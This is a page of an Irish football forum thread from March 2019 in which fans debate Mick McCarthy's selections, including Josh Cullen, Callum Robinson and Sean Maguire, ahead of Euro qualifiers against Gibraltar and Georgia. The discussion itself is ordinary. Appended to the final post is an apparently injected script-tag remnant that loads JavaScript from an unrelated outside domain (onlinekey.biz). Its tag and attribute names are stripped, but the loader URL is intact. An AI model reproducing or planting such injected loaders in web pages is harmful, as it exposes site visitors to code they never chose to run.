Forum Home Forum Home : International : Republic Of Ireland
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Micks first eleven.

Post Reply Post Reply Page  <1 3031323334 59>
Author
Robbie Keane
Robbie Keane
I am MALDING

Post Options Post Options   Thanks (0) Thanks(0)   Quote pre Madonna Quote  Post ReplyReply Direct Link To This Post Posted: 15 Mar 2019 at 2:40pm
Originally posted by Darraghn92 Darraghn92 wrote:

Seen him v Juventus when he got MOTM for West Ham, definitely a good prospect
Friendlies aren't worth a sh*t. 
Sponsored Links

Sullivinho View Drop Down
Alan Kernaghan
Alan Kernaghan

Post Options Post Options   Thanks (0) Thanks(0)   Quote Sullivinho Quote  Post ReplyReply Direct Link To This Post Posted: 15 Mar 2019 at 3:32pm
Originally posted by Stimpy Stimpy wrote:

Mick should cap the sh*t out of Cullen

3 full caps over the next 2 games. Nail it down. Make it happen. Thumbs Up
Green rebel View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Green rebel Quote  Post ReplyReply Direct Link To This Post Posted: 15 Mar 2019 at 3:45pm
Originally posted by gally gally wrote:

Originally posted by DeclanDaly DeclanDaly wrote:

I am a Charlton Season Ticket Holder, and have seen Josh play numerous times this season, he really is a very good player, loved by the fans, sometimes plays DM, sometimes CM, no matter where he plays, he puts in a lot of hard work, Mick came to the Valley mainly looking at Ronan Curtis of Portsmouth, who played really well, scored a great header, and will be a great acquisition for the team, however Josh was the fans man of the match and Mick must have been very impressed with his all round game.

Good to hear gally. Hopefully he takes his chance to impress.

Given the lack of options at DM, could you see him playing that role long term?

He started playing DM for Charlton very well, and it was very noticable how comfortable in possession he was, Charlton have another DM loanee in Bielik from Arsenal who is exceptional at this level, but Cullen is a guaranteed starter for Charlton in either position, Difficult to say which position he is better at, he has had a few assists playing CM this season. I love the guy.
Gally tbh I haven't seen much of him.this season,is he better Dm or Cm,i seen him a couple of times last year,no doubting his talent but looked like he need to mature abit.
gally View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote gally Quote  Post ReplyReply Direct Link To This Post Posted: 15 Mar 2019 at 4:33pm
Originally posted by Green rebel Green rebel wrote:

I am a Charlton Season Ticket Holder, and have seen Josh play numerous times this season, he really is a very good player, loved by the fans, sometimes plays DM, sometimes CM, no matter where he plays, he puts in a lot of hard work, Mick came to the Valley mainly looking at Ronan Curtis of Portsmouth, who played really well, scored a great header, and will be a great acquisition for the team, however Josh was the fans man of the match and Mick must have been very impressed with his all round game.

Good to hear gally. Hopefully he takes his chance to impress.

Given the lack of options at DM, could you see him playing that role long term?

He started playing DM for Charlton very well, and it was very noticable how comfortable in possession he was, Charlton have another DM loanee in Bielik from Arsenal who is exceptional at this level, but Cullen is a guaranteed starter for Charlton in either position, Difficult to say which position he is better at, he has had a few assists playing CM this season. I love the guy.
Gally tbh I haven't seen much of him.this season,is he better Dm or Cm,i seen him a couple of times last year,no doubting his talent but looked like he need to mature abit.

Not sure why you would say that, to me, that is one of his strengths.
DalyerRegular View Drop Down
500 Club la la la
500 Club la la la

Post Options Post Options   Thanks (0) Thanks(0)   Quote DalyerRegular Quote  Post ReplyReply Direct Link To This Post Posted: 16 Mar 2019 at 3:08pm
No hourihane for villa
Banjaxed View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Banjaxed Quote  Post ReplyReply Direct Link To This Post Posted: 16 Mar 2019 at 5:10pm
Sean Maguire is starting up front so. 
Denis Irwin View Drop Down
Robbie Keane
Robbie Keane
Stay Home & watch Lethal Weapon

Post Options Post Options   Thanks (0) Thanks(0)   Quote Denis Irwin Quote  Post ReplyReply Direct Link To This Post Posted: 16 Mar 2019 at 5:16pm
McGoldrick and Maguire up front next week presumably 
Eamonn Dunphy:"I'll tell you who wrote it, Rod Liddle, he's the guy who ran away and left his wife for a young one".

Bill O'Herlihy: Ah ye can't be saying that now Eamonn
Banjaxed View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Banjaxed Quote  Post ReplyReply Direct Link To This Post Posted: 16 Mar 2019 at 5:32pm
Originally posted by Denis Irwin Denis Irwin wrote:

McGoldrick and Maguire up front next week presumably 

Unless for consistency and bedding in purposes he wants to have the same team that will set out against Georgia but  I doubt that will have two up front.
Maccatacca View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote Maccatacca Quote  Post ReplyReply Direct Link To This Post Posted: 16 Mar 2019 at 5:42pm
Callum Robinson played thirty minutes today.

He should be in the squad as an option to come off the bench, especially if we need a goal in the final twenty against Georgia.

doherty View Drop Down
Jack Charlton
Jack Charlton
Teenage Kicks, so hard to beat

Post Options Post Options   Thanks (0) Thanks(0)   Quote doherty Quote  Post ReplyReply Direct Link To This Post Posted: 16 Mar 2019 at 6:13pm
Originally posted by Maccatacca Maccatacca wrote:

Callum Robinson played thirty minutes today.

He should be in the squad as an option to come off the bench, especially if we need a goal in the final twenty against Georgia.

Hes just back no point in rushing him. Im sure preston wouldnt want him to go away just yet either.
Denis Irwin View Drop Down
Robbie Keane
Robbie Keane
Stay Home & watch Lethal Weapon

Post Options Post Options   Thanks (0) Thanks(0)   Quote Denis Irwin Quote  Post ReplyReply Direct Link To This Post Posted: 16 Mar 2019 at 6:38pm
Think Mick said it as well that even if played 90mins today he wouldn't bring him in. Too soon 
Eamonn Dunphy:"I'll tell you who wrote it, Rod Liddle, he's the guy who ran away and left his wife for a young one".

Bill O'Herlihy: Ah ye can't be saying that now Eamonn
Banjaxed View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Banjaxed Quote  Post ReplyReply Direct Link To This Post Posted: 16 Mar 2019 at 7:20pm
Originally posted by Denis Irwin Denis Irwin wrote:

Think Mick said it as well that even if played 90mins today he wouldn't bring him in. Too soon 

I thought Mick said that if Robinson got game time this weekend, he'd be on the blower to Alex Neil to see what the story was..
DeclanDaly View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote DeclanDaly Quote  Post ReplyReply Direct Link To This Post Posted: 16 Mar 2019 at 7:55pm
Would be a lot more confident v Georgia with Robinson involved. He can make things happen with the ball at his feet. Would hate to see us playing like we did last time sending long balls up to Long vs giant CBs
You asked if I'd be anyone from history, fact or fiction, dead or alive:
I said "I'd be Tony Cascarino, circa 1995"
NewtNewbie View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote NewtNewbie Quote  Post ReplyReply Direct Link To This Post Posted: 16 Mar 2019 at 8:32pm
Ahy wasn't he named in the extended squad at least. He's very close to being an automatic starter for me. Very odd.
Banjaxed View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Banjaxed Quote  Post ReplyReply Direct Link To This Post Posted: 16 Mar 2019 at 8:51pm
Originally posted by NewtNewbie NewtNewbie wrote:

Ahy wasn't he named in the extended squad at least. He's very close to being an automatic starter for me. Very odd.

He was injured. 
Maccatacca View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote Maccatacca Quote  Post ReplyReply Direct Link To This Post Posted: 16 Mar 2019 at 8:55pm

Would be a lot more confident v Georgia with Robinson involved. He can make things happen with the ball at his feet. Would hate to see us playing like we did last time sending long balls up to Long vs giant CBs

People can say it’s too early all they want but the lad is already back training and playing so clearly he feels ready. 

I’m not even suggesting we should start him but if the clock hits 70 minutes and it’s 0-0 vs Georgia I’d much prefer bring on Robinson than the likes of McClean.
NewtNewbie View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote NewtNewbie Quote  Post ReplyReply Direct Link To This Post Posted: 16 Mar 2019 at 9:01pm
Originally posted by Banjaxed Banjaxed wrote:

Originally posted by NewtNewbie NewtNewbie wrote:

He was injured. 

He's fit. He played today.

Gibraltar and Georgia are competitive games. We need to score goals, we need wins, otherwise the qualification campaign is over before it's begun.

We need our strongest team out, and Robinson features in our strongest team.
Conan View Drop Down
Davey Langan
Davey Langan
I’m not very bright.

Post Options Post Options   Thanks (0) Thanks(0)   Quote Conan Quote  Post ReplyReply Direct Link To This Post Posted: 16 Mar 2019 at 9:51pm
So Bamford can't play for us for three quarters of a year after returning from injury and that's perfectly reasonable to some but Robinson should be throw right in after six months injured after playing half an hour off the bench?< ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">
 Post Reply Post Reply Page  <1 3031323334 59>
  Share Topic